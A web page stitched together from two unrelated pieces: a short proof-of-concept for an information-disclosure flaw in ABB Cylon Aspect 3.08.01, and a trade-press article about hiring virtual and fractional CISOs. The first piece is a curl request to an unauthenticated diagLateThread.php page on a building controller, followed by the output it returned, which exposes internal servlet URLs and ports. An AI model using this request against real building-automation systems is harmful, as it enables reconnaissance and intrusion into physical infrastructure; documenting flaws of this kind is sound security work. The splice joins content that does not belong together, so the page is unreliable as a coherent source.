░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░          ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl -s http://192.168.73.31/diagLateThread.php | findstr /spina:d "Summary Thread"7:    <title>Thread Class Status</title>47:        #ProjectThreadStatus {127:        var url ='//192.168.73.31/jsonProxy.php?port=7226&application=StatusServlet&query=showTimerThreadPoolStatus%3Dtrue%26descending%3Dtrue%26responseFormat%3Djson';128:        var directUrl ='//192.168.73.31:7226/servlets/StatusServlet?showTimerThreadPoolStatus=true&descending=true&responseFormat=json';203:            $.getJSON(url, processThreadInfo);204:            //$.getJSON(directUrl, processThreadInfo);248:            //infoText = "<div><h2 class='summaryHeading'>"+targetClass+" Class Summary</h2></div><div class='hideable'><div class='summaryInfo'></div>306:        function processThreadInfo(json) {308:            getClassStats(json, PUP_STR, pupLateTime, "PUPLateTable", "pupSummary");309:            getClassStats(json, BACNET_STR, bacnetLateTime, "BACnetLateTable", "bacnetSummary");310:            getClassStats(json, SDP_STR, sdpLateTime, "SDPLateTable", "sdpSummary");311:            getClassStats(json, SCHEDULE_STR, scheduleLateTime, "ScheduleLateTable", "scheduleSummary");312:            getClassStats(json, DEFAULT_STR, defaultLateTime, "DefaultLateTable", "defaultSummary");315:            $("#ProjectThreadStatus").empty();316:            $("#ProjectThreadStatus").append("<div class='ThreadDiv'><h2>Thread Status at " + systemTime.toTimeString() + "</h2></div>");317:            $("#ProjectThreadStatus").append("<div class='ThreadDiv'>Total Timers: " + json.totalTimers + "</div>");318:            $("#ProjectThreadStatus").append("<div class='ThreadDiv'>Total Targets: " + json.totalTargets + "</div>");323:            var warningTime = (timebase * 1000) * threadWarnPercent;324:            var errorTime = (timebase * 1000) * threadErrorPercent;534:    <div id="ProjectThreadStatus"></div>537:        <div class='infoSection ThreadDiv' id="bacnetInfo">538:            <div id="bacnetHeading"><h2>BACnet Summary</h2>541:                    <div id="bacnetSummary"></div>550:        <div class='infoSection ThreadDiv' id="pupInfo">551:            <div id="pupHeading"><h2>PUP Summary</h2>554:                    <div id="pupSummary"></div>563:        <div class='infoSection ThreadDiv' id="sdpInfo">564:            <div id="sdpHeading"><h2>SDP Summary</h2>567:                    <div id="sdpSummary"></div>576:        <div class='infoSection ThreadDiv' id="scheduleInfo">577:            <div id="scheduleHeading"><h2>Schedule Summary</h2>580:                    <div id="scheduleSummary"></div>589:        <div class='infoSection ThreadDiv' id="defaultInfo">590:            <div id="defaultHeading"><h2>Default Summary</h2>593:                    <div id="defaultSummary"></div>

ABB Cylon Aspect 3.08.01 diagLateThread.php Information Disclosure

With cybersecurity talent hard to come by and companies increasingly looking for guidance and best practices, virtual and fractional chief information security officers can make a lot of sense.

Source: Gorodenkoff via Shutterstock

Numerous paths lead a company to retain a virtual chief information security officer (vCISO).

Companies that work with managed security service providers (MSSPs) may need to expand their security strategy and thus engage a vCISO. Following a breach, an incident response firm may recommend that the business develop a proactive security and response plan by hiring a part-time CISO. Venture capitalists may need a security expert to do due diligence during a merger or acquisition. Even cyber insurers now recommend vCISOs to policyholders to shepherd them through the process of developing best practices.

In the end, a virtual CISO gives a company an expert who can manage the security program of the business in a consistent way and often brings a different perspective, helping security teams see the forest and not just the trees, says Thomas Siu, CISO at Inversion6, a provider of virtual CISO services.

"We have a chance to step back from the business process or even the client because we're distant enough that we can look at the whole big picture," he says. "As a CISO, I could still bring in a fractional CISO to look at specific problem space for me — sometimes, the tree-forest issue does occur."

Virtual and fractional CISOs are taking off. While the shortage in cybersecurity-skilled executives makes hiring a full time CISO an expensive proposition, paying for a part-time leader to manage the overall security strategy often makes sense. While a consultant might fit the bill, often companies want an expert who could provide a consistent viewpoint based on an agreed-upon strategy or a fractional CISO who has specific skills or knowledge, such as in operational technology or a certain region's regulations.

Whether the hiring impetus is a merger, a cyber-insurance policy, or a security incident, a virtual CISO can help a company develop a long-term strategy, says Adam Tyra, general manager of security services at cyber-insurance firm At-Bay, which offers managed services and vCISO services.

"Most companies are only having that insurance conversation once a year, and then they don't have it again until it's time for the policy to renew, but the threat landscape is going to change continuously," he says. "You should be doing a lot more than the minimum that's required just to get insurance, and that's where your vCISO can help."

**Lost Your CISO? Consider a vCISO**

For Inversion6's Siu, the path to becoming a virtual CISO started with his work for an MSSP, handling discrete projects for clients. A former CISO at Michigan State University and Case Western Reserve University, Siu acted as a vCISO for a company doing executive protection, where he would create a cybersecurity plan for the company at risk and regularly check in to make sure the plan was being followed. Companies would also contact Siu to fill a gap when an existing CISO decided to move on.

"Somebody would lose their CISO, and they needed someone step in to do the program — it turned out to be a different economic model to have a vendor run that kind of strategic business advisory service long term," he says. "You weren't so much involved operationally. You were helping them with their budgets. You were helping them with their strategy. So you could dial it up as much as you want or dial it back, but you had to always be on call."

Typically companies in need of a vCISO reach out for one of three reasons: to meet their regulatory or contractual security requirements, to meet or exceed industry norms for cybersecurity, or to build a security program as a competitive differentiator, says At-Bay's Tyra.

"If you are a company that has a robust IT capability where you can implement all your own systems, and you're good at managing all your technology, a vCISO service may be all that you need," he says. "You get pointed in the right direction, with a punch list of projects to go execute, and then you have the IT capability to go do those things."

**When a vCISO Is Not Enough**

Yet often having a plan is not the same as executing a plan. In those cases, companies may want to seek out managed security services to acquire specific cybersecurity capabilities. Determining whether a company needs more than a vCISO is, oddly enough, a good job for a vCISO, says At-Bay's Tyra.

"This is an area where I think a lot of companies are not honest with themselves about whether or not they have those capabilities internally," he says. "That's another area where a vCISO could potentially provide input, helping people figure out if the advice going to be good enough or \[if\] you need actual hands on your systems to get where you're trying to go."

Finally, as new threats arise, companies often want to know how they could be impacted. Because vCISO services often have a depth of expertise that companies cannot retain on staff, they can come in and provide recommendations to deal with new technologies, like artificial intelligence, or changes to the threat landscape, says Inversion6's Siu.

"Even if someone has a security program already, they bring us in to touch places that they just don't have the depth for, which they might not even be able to hire for, because it's so specialized," he says. "We can use that to help people understand where those particular \[threats\] fit into their overall risk profile."

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Tag

#intel